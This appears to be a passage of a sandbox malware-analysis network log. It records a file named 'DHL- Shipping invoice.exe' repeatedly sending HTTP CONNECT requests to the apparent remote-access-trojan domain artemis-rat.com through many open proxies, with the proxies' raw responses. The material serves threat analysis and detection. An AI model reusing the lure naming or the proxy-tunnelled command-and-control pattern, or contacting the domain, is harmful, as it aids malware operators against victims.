                            Mar 12, 2024 08:37:07.265837908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953421116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062788010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.250128031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.359406948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.562632084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.750072002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.874818087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1782192.168.2.45527246.182.6.69387806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.782185078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.250068903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.750345945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.815871000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.950359106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.953192949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.046966076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.047029018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.046777964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1783192.168.2.45524565.21.255.19731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.782944918 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:06.971518993 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:07.177071095 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1784192.168.2.454599179.111.216.10236296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.784923077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1785192.168.2.455403103.50.76.984436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.797378063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1786192.168.2.455404103.50.76.984436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.798000097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1787192.168.2.455405103.50.76.984436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.799989939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1788192.168.2.455406103.50.76.984436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.800775051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1789192.168.2.455174198.44.255.3806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.805392981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1790192.168.2.45524954.233.119.17231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.807679892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.007147074 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1791192.168.2.455153103.216.50.22480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.807904005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1792192.168.2.454478128.199.116.3444446484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.810713053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.932504892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.315362930 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1793192.168.2.455277193.239.58.9280816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.812417030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1794192.168.2.4552118.213.128.9045066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.814706087 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:07.453294992 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:09.509936094 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:11.510397911 CET44INHTTP/1.1 200 OK
                            Content-Type: text/html


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1795192.168.2.45520814.50.81.64806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.817715883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.103146076 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1796192.168.2.4551768.217.95.4488996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.823030949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.132814884 CET741INHTTP/1.1 500 Internal Server Error
                            Server: nginx/1.25.1
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 579
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                            Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.25.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1797192.168.2.455217132.148.128.8885956484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.825453997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453289032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453389883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.265883923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.765791893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.250051022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.750372887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.749859095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:41.564356089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1798192.168.2.455302217.27.149.19041536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.825931072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1799192.168.2.45528820.206.106.192806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.833642006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.452507019 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:08 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1800192.168.2.455223110.12.211.140806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.840796947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1801192.168.2.455172111.90.150.10910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.841331005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1802192.168.2.455361104.18.254.76806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.842746973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.930114985 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1803192.168.2.4551711.15.62.1256786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.845010042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1804192.168.2.455366185.238.228.240806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.845844984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.933001995 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1805192.168.2.45534423.152.40.1550506484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.846189976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
